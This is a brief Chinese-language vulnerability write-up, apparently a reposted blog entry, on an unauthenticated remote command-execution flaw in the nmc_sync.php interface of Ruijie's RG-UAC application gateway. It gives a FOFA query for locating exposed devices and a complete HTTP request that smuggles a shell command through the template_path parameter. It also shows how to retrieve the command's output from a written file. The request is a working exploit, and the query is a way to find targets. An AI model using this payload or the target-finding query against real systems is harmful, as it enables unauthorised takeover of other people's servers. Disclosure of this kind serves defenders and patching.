登录 白背景
源码

锐捷RG-UAC应用网关nmc_sync.php前台RCE漏洞

一、漏洞描述

锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。

二、影响版本

锐捷RG-UAC应用网关

三、资产测绘

fofa:app="Ruijie-RG-UAC"
特征:
图片.png

四、漏洞复现

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>dudesuite.txt|cat HTTP/1.1
Host: xxx
Accept-Encoding: gzip

图片.png
访问:https://xxx/view/systemConfig/management/dudesuite.txt
图片.png

原文: https://www.yuque.com/xiaokp7/ocvun2/rfgy0baogx9o6g6b